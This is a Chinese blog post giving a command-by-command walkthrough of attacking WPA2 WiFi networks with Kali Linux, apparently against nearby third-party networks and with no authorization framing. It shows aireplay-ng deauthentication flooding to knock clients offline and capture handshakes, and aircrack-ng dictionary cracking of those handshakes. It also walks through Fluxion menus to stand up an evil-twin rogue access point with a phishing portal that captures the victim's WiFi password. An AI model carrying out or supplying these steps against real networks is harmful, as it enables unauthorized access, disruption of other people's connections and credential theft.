kali无线网渗透

最新推荐文章于 2024-01-17 09:13:03 发布
最新推荐文章于 2024-01-17 09:13:03 发布
阅读量260 收藏 4
点赞数
分类专栏: 渗透测试 文章标签: 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36585338/article/details/131881962
版权

kali无线网渗透

前提

——无线网卡配置问题

#无线渗透工具前提:无线网卡
#环境:本来用作监听功能的3037芯片无线网卡,自己胡乱调,一不小心调试成了物理网卡的功能,变成了WLAN2网卡,结果用在了Windows系统上!如果你也是这样,点开你的网络适配器看看吧!
#解决思路:
1.删驱动设备
	删除Windows上的无线网卡驱动,商家说的是免驱网卡,即插即用。
	右键我的电脑➡管理➡设备管理➡找到该网卡驱动(网卡名字)➡直接删除
2.更改网卡工作模式
重新开启虚拟机连接无线网卡,发觉无线网卡的工作模式被更改为 Managed
监听模式是Monitor,要给他改过来
方法:关闭网卡➡修改模式➡开启网卡
┌──(root kali)-[~]
└─# ifconfig wlan0 down
┌──(root kali)-[~]
└─# iwconfig wlan0 mode monitor
┌──(root kali)-[~]
└─# ifconfig wlan0 up
3.查看无线网卡状态——是否为监听模式Monitor
wlan0     IEEE 802.11  Mode:Monitor  Frequency:2.412 GHz  Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off
3.检测环境
┌──(root kali)-[~]
└─# airmon-ng check kill

常规

——在网卡无问题时来到这一步

1.开启监听模式
─# airmon-ng start wlan0
2.开始扫描WIFI
└─# airodump-ng wlan0
CH  7 ][ Elapsed: 1 min ][ 2022-09-16 22:44                                                BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID              5C:02:14:F8:7F:9E  -83        0        1    0   6  360   WPA2 CCMP   PSK  蹭网请交钱       3C:06:A7:B3:D6:FC  -45       31        0    0   1  270   WPA2 CCMP   PSK  TP-LINK_777       44:FB:5A:67:21:8C  -45       31        0    0   3  130   WPA2 CCMP   PSK  CU_CP7b     94:BF:80:1A:F6:8C  -57       26        0    0   3  130   WPA2 CCMP   PSK  CU_G4Sz     10:39:4E:00:6A:ED  -59       31        1    0   2  130   WPA2 CCMP   PSK  ChinaUnicom-6AE8
#BSSID:wifi的MAC地址
#PWR:wifi信号强度,数值越小越信号强
#DATA:数据量,越大使用人越多
#CH:wifi的信道频率(频道)
#ESSID:wifi名字,中文可能乱码
3.抓取wifi数据包
└─# airodump-ng --bssid 12:4A:6A:B2:0C:0C -c 1 -w ~/wlan/2/2 wlan0mon
#airodump-ng:扫描
#--bssid:路由MAC地址
#-c;信道频率
#-w:保存路径	注意路径必须存在
#wlan0mon:设备名
4.断网攻击——使对方掉线重连,捕获cap握手包
└─# aireplay-ng -0 16666 -a 12:4A:6A:B2:0C:0C  -c 74:4C:A1:7D:06:6B -D wlan0mon
#aireplay-ng:攻击
#-0:数据包量
#-a:路由MAC
#-c:客户端MAC	如手机电脑等等
#-D:设备名
5.在抓包终端看到WPA handshake就是说捕获成功了
#注意在捕获成功将两个终端结束掉,不然对方一直处于断网状态
6.破解握手包
└─# aircrack-ng ~/fluxion/attacks/Handshake\ Snooper/handshakes/ChinaUnicom-6AE8-10:39:4E:00:6A:ED.cap -w /mnt/windows/dictionary/superdic.txt 
#aircarack-ng:破解
#xx.cap:握手包
#-w:指定字典路径

特殊

——网站钓鱼

1.安装钓鱼工具
└─# git clone https://github.com/FluxionNetwork/fluxion      
2.安装钓鱼工具依赖
└─# ./fluxion.sh -i
3.使用钓鱼工具
└─# ./fluxion.sh
        [1] 专属门户 创建一个“邪恶的双胞胎”接入点。
        [2] Handshake Snooper 检索WPA/WPA2加密散列。
        [3] 返回 
[fluxion@kali]-[~] 2
#选择方式
----------------------------------------------------
[*] 选择要扫描的信道                                                                         
        [1] 扫描所有信道  (2.4GHz)                                                           
        [2] 扫描所有信道  (5GHz)                                                             
        [3] 扫描所有信道  (2.4GHz & 5Ghz)                                                   
        [5] 返回                                                                           
[fluxion@kali]-[~] 3
#开始扫描WIFI,进行选取Ctrl+C结束扫描终端
----------------------------------------------------
ESSID        			   QLTY PWR STA CH SECURITY            BSSID
[001] TP-LINK_312        	16% -85   0  6 WPA2      			18:F2:2C:B6:37:D4
[002] ChinaNet-2.4G-9901 	16% -85   0 11 WPA2      			FC:60:9B:1B:99:03
......
[fluxion@kali]-[~] 50
#选取编号
-----------------------------------------------------
[*] 为目标跟踪选择无线接口.
[*] 可能需要选择专用接口.
[*] 如果您不确定,请选择"跳过"!
[1] wlan0mon [*] Ralink Technology, Corp. RT5370                                           
[2] 跳过                                                                                   
[3] 重试                                                                                   
[4] 返回 
[fluxion@kali]-[~] 2
#根据提示做选择
-----------------------------------------------------
[*] 此攻击已经配置完毕
        [1] 恢复攻击
        [2] 重置攻击
[fluxion@kali]-[~] 2
#因为我已经配置过攻击,所以再次进行时要选择,重置攻击
-----------------------------------------------------
[*] 选择一种方式来检查握手包获取状态
        [1] 监听模式 (被动)
        [2] aireplay-ng 解除认证方式 (侵略性)
        [3] mdk4 解除认证方式 (侵略性)
        [4] 返回
[fluxion@kali]-[~] 2
#常规选择2
-----------------------------------------------------
[*] 选择Hash的验证方法
        [1] aircrack-ng 验证 (不推荐)
        [2] cowpatty 验证 (推荐用这个)
        [3] 返回
[fluxion@kali]-[~] 1
#1或2都可以,建议配套
----------------------------------------------------
[*] 每隔多久检查一次握手包
        [1] 每30秒钟 (推荐).
        [2] 每60秒钟
        [3] 每90秒钟
        [4] 返回
[fluxion@kali]-[~] 1
#抓包时间设置
---------------------------------------------------
[*] 如何进行验证?
        [1] Asynchronously (fast systems only).
        [2] Synchronously (推荐).
        [3] 返回
[fluxion@kali]-[~] 2
#选择2
--------------------------------------------------
[*] Handshake Snooper 正在进行攻击......
        [1] 选择启动攻击方式
        [2] 退出
[fluxion@kali]-[~] 1
#开始对数据包捕获,捕获成功后再进行选择攻击方式(左下角会提示攻击是否成功)
--------------------------------------------------
[*] 请选择一个攻击方式
        [1] 专属门户 创建一个“邪恶的双胞胎”接入点。
        [2] Handshake Snooper 检索WPA/WPA2加密散列。
        [3] 返回 
[fluxion@kali]-[~] 1
#这时候可以进行选择钓鱼攻击
--------------------------------------------------
[*] 为目标跟踪选择无线接口.
[*] 可能需要选择专用接口.
[*] 如果您不确定,请选择"跳过"!
[1] wlan0mon [*] Ralink Technology, Corp. RT5370                                           
[2] 跳过                                                                                   
[3] 重试                                                                                   
[4] 返回                                                                                   
[fluxion@kali]-[~] 2
#选择2
--------------------------------------------------
[*] 此攻击已经配置完毕
        [1] 恢复攻击
        [2] 重置攻击
[fluxion@kali]-[~] 2
#因为我已经配置过攻击,所以再次进行时要选择,重置攻击
--------------------------------------------------
[*] 为接入点选择一个接口
[1] eth0     [+] Intel Corporation 82545EM Gigabit Ethernet Controller (Copper) (rev 01)   
[2] wlan0mon [*] Ralink Technology, Corp. RT5370                                           
[3] 重试                                                                                   
[4] 返回                                                                                   
[fluxion@kali]-[~] 2
#选择无线网卡设备
---------------------------------------------------
[*] Select a method of deauthentication
[1] mdk4
[2] aireplay
[3] mdk3
[fluxion@kali]-[~] 
#选择mdk4方式
---------------------------------------------------
[*] 选择一个接入点       
        [1] 流氓 AP - hostapd (推荐)
        [2] 流氓 AP - airbase-ng (缓慢)
        [3] 返回
[fluxion@kali]-[~] 1
#选择钓鱼类型
---------------------------------------------------
[*] 请选择验证密码方式                                       
        [1] hash - cowpatty
        [2] hash - aircrack-ng (default, unreliable)
        [3] 返回
[fluxion@kali]-[~] 1
#使用hash值进行攻击
----------------------------------------------------
#之后就是选择使用抓取到的hash文件,或者手动配置
#使用cowpatty验证
#创建SSL证书
#断开对方网络	断网攻击
#选择钓鱼语言	中文 		3
#弹出6个窗口	右上角会显示对方密码是否成功获取
出顾茅庐
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali Linux渗透测试——无线渗透
Captain_RB的博客
03-17 3657
Kali Linux渗透测试学习笔记——无线渗透 笔记内容参考安全牛Kali Linux渗透测试视频教程,仅供个人学习记录使用。 文章目录Kali Linux渗透测试学习笔记——无线渗透一、基本概念 一、基本概念 无线通信领域庞大复杂,这里只介绍 图1 常见无线通信技术分类 ...
Kali Linux无线网渗透kali安装教程
11-06
**Kali Linux无线网渗透测试教程** Kali Linux是一款专为网络安全和渗透测试设计的操作系统,源自著名的BackTrack项目。自2013年BackTrack停更后,Kali Linux继承了其精神,集成了大量渗透测试、网络扫描和攻击...
kali linux 无线渗透[aircrack-ng]及问题解决
hints'blog
10-08 4591
首先:你要有一个兼容kali linux的无线网卡用于嗅探网络 如我的是:RT3070(免驱) 注:kali linux系统不能使用物理主机上的网卡 1.显示或配置网络设备(网络接口卡) ifconfig 注:网卡信息配置:/etc/network/interfaces auto lo # auto表示开机启动该网卡设备 iface lo inet loopback auto et...
Kali linux无线网渗透详解笔记
最新发布
Python_0011的博客
01-17 1027
通过抓取握手包进行暴力破解,这种情况主要是看字典强度还有看运气,如果密码过于复杂,字典中没有对应的密码,则不可能破解出来的,对于一个普通的密码,只要有一个好的密码字典,还是可以轻而易举得破解出来的。WPS的漏洞:PIN码时8位十进制构成,最后一位可以由前面7位算出,验证时先检测前4位,如果一致会得到一个反馈信息,所以只需扫描10000次就一定可以获得前4位PIN码,接下来最多扫描1000次既可确定后四位,pin时速度最快为2s/pin。设置捕获过滤器,捕获所需要的网络包,通过显示过滤器过滤出想要分析的包。
利用Kali 完成一次简单的渗透
qq_50905066的博客
03-20 3万+
这里我们需要两台虚拟机。一台Kali 作为攻击机,一台Ubuntu作为靶机。 如图: 渗透的话我们需要先得到靶机的ip 地址才能进行扫描。因为是虚拟机,只要我们知道了Kali 的ip 的地址,扫描其所在网段就可以获得靶机的地址了。 如图: 通过使用Kali自带的扫描工具执行Namp -sP 192.168.161.1/24就可以扫到了。这里我们排出太小的地址和太大的地址以及攻击的地址就可以确定靶机的地址了。 在得到靶机的地址之后,我们就可以进一步扫描靶机端口,从其中获得靶机开启的端口和..
Kali渗透基础》14. 无线渗透(四)
学习学习学习......
08-09 1368
Aircrack-ng、JTR、Evil Twin Attacker、Wifipumpkin3、Fern-WiFi-Cracker、Kismet、Reaver、WiFite、MAC 地址绑定攻击、WEP 攻击、WPA PSK 攻击、WPA 企业攻击、WPS 攻击、无线侦查。
Kali Linux无线网渗透测试教程
12-25
Kali Linux无线网渗透测试教程
Kali Linux无线网渗透测试教程(大学霸)
11-26
Kali Linux无线网渗透测试教程(大学霸) Kali Linux无线网渗透测试教程(大学霸) Kali Linux无线网渗透测试教程(大学霸)
Kali-Linux无线网渗透测试详解
06-22
Kali Linux无线网渗透测试详解》是国内第一本无线网络安全渗透测试图书。本书基于Kali Linux操作系统,由浅入深,全面而系统地介绍了无线网渗透技术。本书针对不同的加密方式的工作原理及存在的漏洞进行了详细...
Kali渗透基础》11. 无线渗透(一)
学习学习学习......
07-30 520
无线技术、IEEE 802.11 标准、无线网络运行模式(Infrastructure,AD-HOC,WDS,Monitor Mode,基本术语)、无线技术概念(信号单位,全向天线,定向天线)。
kali linux无线渗透测试入门指南 mobi kindle
10-23
mobi格式,kindle查看,资源来自网络,如有侵权,联系删除
kali虚拟机-----破解wifi密码(WiFi渗透
weixin_46471800的博客
08-10 8020
文章目录一、将无线网卡挂载到 虚拟机上二、查看是否挂载成功三、查看网卡是否支持监听模式四、检查文件监听影响并杀死影响五、开启无线监听模式六、开始监听七、开始抓包(新建一个命令窗口)八、对已连接的终端进行攻击,使它掉线重连,以此来获取数据包。(新建一个命令窗口)九、开始解密 一、将无线网卡挂载到 虚拟机上 可能出现的问题:在可移动设备处无法连接无线网卡; 解决:在虚拟机设置中将usb控制器设置成如图所示。 注意要先关闭虚拟机在设置。 二、查看是否挂载成功 使用ifconfig命令查看 三、查看网卡是
Kali渗透基础》12. 无线渗透(二)
学习学习学习......
08-03 701
无线协议栈(ifconfig,iwconfig,iw,iwlist)、无线网卡配置、RADIOTAP 头部、MPDU、Control Frame、Management Frame、Data Frame。
十四、Kali Linux 2 无线安全渗透测试
m0_55313512的博客
02-21 2946
Kali Linux 网络渗透测试
kali wifi 无线渗透测试 网卡桥接搭建无赖AP
qq_31042199的博客
07-31 1464
本技术博客只用于实验环境的测试学习,不可用于其他用途,否则造成的后果自行承担! 1.查看网卡并启动相应网卡的监听模式 ifconfig -a airmon-ng start wlan1 启动监听模式之后网卡名称会变为wlan1mon(根据具体网卡名而有所不同,如:wlan0mon)查看网卡的工作模式可以用: iwconfig wlan1mon 查看Mode字样,如果为Monitor则确定当前网卡已进入监听模式 2.指定网卡在信道7进行扫描,寻找目标wifi ariodump wlan1mon -..
kali无线渗透测试
qq_42143925的博客
03-27 1258
一、kali中的无线功能 iwconfig 查看网卡连接情况 airmon-ng start wlan0 在终端启动wlan0,设置成监听模式 查看网卡工作模式 from pythonwifi.iwlibs import Wireless wifi=Wireless('wlan0mon') print(wifi.getMode()) airodump-ng wlan0mon 查看所有...
使用Kali无线渗透获取宿舍WiFi密码(WPA)
热门推荐
Mi1k7ea
08-02 8万+
最近没啥时间写博客了,就把之前的一些笔记但是没写到博客上的都更上来吧~ 无线安全水很深,本人前段时间也是因为实验报告内容是关于无线渗透的才接触了一些在Kali中关于无线渗透的一些命令,不足不处很多,望大牛们指教~ 本人宿舍的无线加密协议为WPA,因而着此次是针对WPA进行操作的,本机当时的网是自己开的有线网络没连宿舍的WiFi,当时也不知道宿舍的密码是不是弱口令,就尝试一下吧。 相关WEP、
Kali Linux 无线渗透测试入门指南 第一章 配置无线环境
龙哥盟
10-20 6万+
第一章 配置无线环境 作者:Vivek Ramachandran, Cameron Buchanan 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 如果我要在八个小时之内砍倒一棵树,我会花六个小时来磨我的斧子。 – 亚伯拉罕·林肯,第 16 任美国总统 在每次成功的渗透测试背后,是数小时或者数天的准备,无线渗透测试也不例外。这一章中,我们会创建无线环境
kali无线网卡推荐
08-14
根据引用和引用的内容,针对Kali Linux的无线渗透,推荐使用Realtek RTL8812AU芯片的无线网卡。这款网卡具有支持802.11 a/b/g/n/ac协议的能力,可以同时支持2.4GHz和5GHz频段,并且具备较高的网络速率。其中,Alfa...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值